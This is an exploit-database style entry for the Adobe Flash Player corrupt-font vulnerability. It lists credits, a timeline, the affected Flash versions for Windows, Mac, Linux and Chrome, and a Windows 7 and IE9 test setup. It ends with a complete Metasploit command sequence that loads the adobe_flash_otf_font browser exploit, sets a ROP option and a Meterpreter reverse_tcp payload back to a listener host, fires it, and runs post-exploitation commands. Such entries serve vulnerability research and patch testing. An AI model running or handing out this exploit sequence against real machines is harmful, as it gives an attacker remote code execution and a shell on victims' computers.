Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor the 2012-08-14
Metasploit PoC provided the 2012-08-17
PoC provided by :
Affected version(s) :
Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 18.104.22.168 and earlier versions for Linux
Flash Player installed with Google Chrome earlier version 21.0.1180.79.
Tested on Windows 7 Integral with :
Internet Explorer 9
Adobe Flash Player 11.3.300.268
This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild.
use exploit/windows/browser/adobe_flash_otf_font set SRVHOST 192.168.178.100 set ROP JRE set TARGET 6 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid